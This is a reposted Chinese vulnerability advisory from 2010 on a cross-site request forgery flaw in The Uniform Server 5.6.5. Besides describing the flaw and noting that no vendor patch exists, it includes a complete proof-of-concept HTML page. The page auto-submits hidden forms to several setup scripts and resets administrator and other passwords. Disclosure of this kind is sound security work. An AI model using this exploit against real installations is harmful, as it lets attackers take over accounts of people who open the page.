The Uniform Server多个页面跨站请求伪造漏洞

来源:岁月联盟 编辑:老鹰 时间:2010-06-04

影响版本:
The Uniform Server 5.6.5

程序介绍:
The Uniform Server是一个可以运行在任何的基于Windows操作系统上的WAMP软件包。

漏洞分析:

The Uniform Server没有执行有效性检查便允许用户通过HTTP请求执行某些操作,远程攻击者可以通过向apsetup.php、psetup.php、sslpsetup.php、mqsetup.php等脚本POST请求执行跨站请求伪造攻击,更改管理员口令。

漏洞利用:

<html>  
<head>  
    <script type="text/javascript">  
        window.onload = function() {  
            var url = 'http://localhost/apanel';  
              
            var xsrs = [  
                {  
                    "action": url + "/apsetup.php",  
                    "method": "post",  
                    "submitCall": "document.forms[0].submit.click()",  
                    "fields": [  
                        { "name": "apuser", "value": "new_username" },  
                        { "name": "appass", "value": "new_password" },  
                        { "name": "submit", "value": "Change", "type": "submit" }  
                    ]  
                },  
                {  
                    "action": url + "/psetup.php",  
                    "method": "post",  
                    "submitCall": "document.forms[0].submit.click()",  
                    "fields": [  
                        { "name": "puser", "value": "new_username" },  
                        { "name": "ppass", "value": "new_password" },  
                        { "name": "submit", "value": "Change", "type": "submit" }  
                    ]  
                },  
                {  
                    "action": url + "/sslpsetup.php",  
                    "method": "post",  
                    "submitCall": "document.forms[0].submit.click()",  
                    "fields": [  
                        { "name": "puser", "value": "new_username" },  
                        { "name": "ppass", "value": "new_password" },  
                        { "name": "submit", "value": "Change", "type": "submit" }  
                    ]  
                },  
                {  
                    "action": url + "/mqsetup.php",  
                    "method": "post",  
                    "submitCall": "document.forms[0].submit.click()",  
                    "fields": [  
                        { "name": "qpass", "value": "new_password" },  
                        { "name": "submit", "value": "Change", "type": "submit" }  
                    ]  
                }  
            ];  
  
            for (var x = 0; x < xsrs.length; x++) {  
                var attackFrame = document.createElement('iframe');  
  
                var html = '<html><body><form action="' + xsrs[x].action + '" ' +  
                    'method="' + xsrs[x].method + '">';  
  
                for (var y = 0; y < xsrs[x].fields.length; y++) {  
                    html += '<input type="' +  
                        (xsrs[x].fields[y].type != null ?  
                            xsrs[x].fields[y].type : 'hidden') + '" ' +  
                        'name="' + xsrs[x].fields[y].name + '" ' +  
                        'value="' + xsrs[x].fields[y].value + '" />';  
                }  
  
                html += '</form><script>' + xsrs[x].submitCall + 'x3c/script></body></html>';  
  
                document.body.appendChild(attackFrame);  
  
                attackFrame.contentDocument.write(html);  
            }  
        }  
    </script>
</head>
<body>
</body>
</html>

解决方案:
厂商补丁:
Uniform Server Development Team
-------------------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.uniformserver.com/

上一篇:Accoria Rock Web Server多个输入验证漏洞
下一篇:OpenSSL EVP_PKEY_verify_recover()无效返回值绕过密钥验证漏洞

最近更新

随机推荐